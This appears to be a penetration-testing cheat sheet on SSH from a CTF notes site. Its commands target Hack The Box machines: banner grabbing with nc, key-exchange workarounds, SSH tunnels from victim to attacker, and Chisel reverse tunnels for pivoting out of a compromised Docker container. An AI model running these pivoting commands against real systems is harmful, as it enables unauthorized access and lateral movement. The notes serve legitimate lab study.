22 - SSH

$ nc -vn <IP> 22

Generate SSH Key

$ ssh-keygen -t rsa -b 4096 -f matt-id_rsa

No Matching Key Exchange

$ ssh root@beep.htb
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
$ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 root@beep.htb

SSH Tunneling

// Remote tunnel from victim, enum victim port 5432 (postgresql)
ssh -N -f -R 5432:localhost:5432 p3@10.10.14.10

// Local tunnel from attacker, enum victim port 8002
ssh -N -f -L 8002:localhost:8002 hflaccus@carpediem.htb
ssh -N -f -L 3306:localhost:3306 charlie@extension.htb -i id_rsa

## Using Chisel to enumerate local webservices on remote host
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 4444 -reverse

// Chisel Client (victim host)
$ ./chisel_1.7.7_linux_amd64 client 10.10.14.5:4444 R:8080:127.0.0.1:8080

## Using Chisel to setup a tunnel from compromized docker container to proxy
## traffic toward docker host (172.17.0.1:3000). 
// Chisel Server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 3333 -reverse

// Chisel Client (victim docker)
./chisel_1.7.7_linux_amd64 client 10.10.15.17:3333 R:127.0.0.1:3000:172.17.0.1:3000

Brute Force id_rsa

Vault SSH OTP

Vault is used to provice one-time passwords (OTP) for SSH logins. To request a OTP you need to know the role example ssh/creds/otp_key_role, the role is found in secrets.sh.

Interesing Files

Last updated

Was this helpful?